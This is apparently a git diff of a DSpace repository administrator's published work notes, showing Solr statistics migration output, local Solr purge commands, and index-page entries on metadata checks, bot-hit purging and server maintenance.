                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2013

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2013

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2013 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2013
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -           2,352,124    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -           1,117,676    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             575,711    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             171,639    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -                 248    Item Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -                   7    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -                   5    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -               1,452    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           4,218,862    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2013
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +           2,352,124    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,117,676    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             575,711    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             171,639    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +                 248    Item Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +                   7    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +                   5    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +               1,452    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           4,218,862    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 2,548 : (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 29,772: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 32,320: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 15,691 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2013/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2012

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2013/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2012

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2012 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2012
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -           2,229,332    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             913,577    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             215,577    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             104,734    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           3,463,220    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2012
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +           2,229,332    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             913,577    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             215,577    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             104,734    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           3,463,220    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 33,161: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 33,161: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 33,161 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2011

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2011

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2011 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2011
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -             904,896    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             385,789    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             154,356    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -              62,978    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           1,508,019    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2011
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +             904,896    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             385,789    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             154,356    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              62,978    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,508,019    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 17,551: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 17,551: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 12,116 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2010

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2010

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2010 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2010
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -              26,067    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -              15,615    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -               4,116    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -               1,094    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -              46,892    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2010
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +              26,067    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              15,615    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +               4,116    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +               1,094    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +              46,892    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 1,012: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 1,012: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 654 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing Solr statistics with AtomicStatisticsUpdateCLI

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing Solr statistics with AtomicStatisticsUpdateCLI

                                                                                                                                                                                                                                                                                                                                                                                                                                On 2020-11-18 I finished processing the Solr statistics with solr-upgrade-statistics-6x and I started processing them with AtomicStatisticsUpdateCLI.

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics

                                                                                                                                                                                                                                                                                                                                                                                                                                First the current year’s statistics core, in 12-hour batches:

                                                                                                                                                                                                                                                                                                                                                                                                                                diff --git a/docs/index.html b/docs/index.html index c15f6afee..1ff179ff5 100644 --- a/docs/index.html +++ b/docs/index.html @@ -10,14 +10,14 @@ - + - + @@ -109,11 +109,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                • Send Gaia the last batch of potential duplicates for items 701 to 980:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                Read more → @@ -185,13 +185,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                                              • Atmire merged some changes I had submitted to the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                                                                                                              • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                                              +Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              Read more → @@ -214,9 +214,9 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                            • I experimented with manually sharding the Solr statistics on DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                                                            • First I exported all the 2019 stats from CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                                                            +$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            Read more → @@ -238,15 +238,15 @@ $ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                            • Export all affiliations on CGSpace and run them against the latest RoR data dump:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                            -ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                            -1879
                                                                                                                                                                                                                                                                                                                                                                                                                            -$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                            -7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                              +ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                              +1879
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                              +7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              • So we have 1879/7100 (26.46%) matching already
                                                                                                                                                                                                                                                                                                                                                                                                                              Read more → @@ -303,8 +303,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                              • Update Docker images on AReS server (linode20) and reboot the server:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
                                                                                                                                                                                                                                                                                                                                                                                                                                Read more → @@ -328,9 +328,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                -COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                +
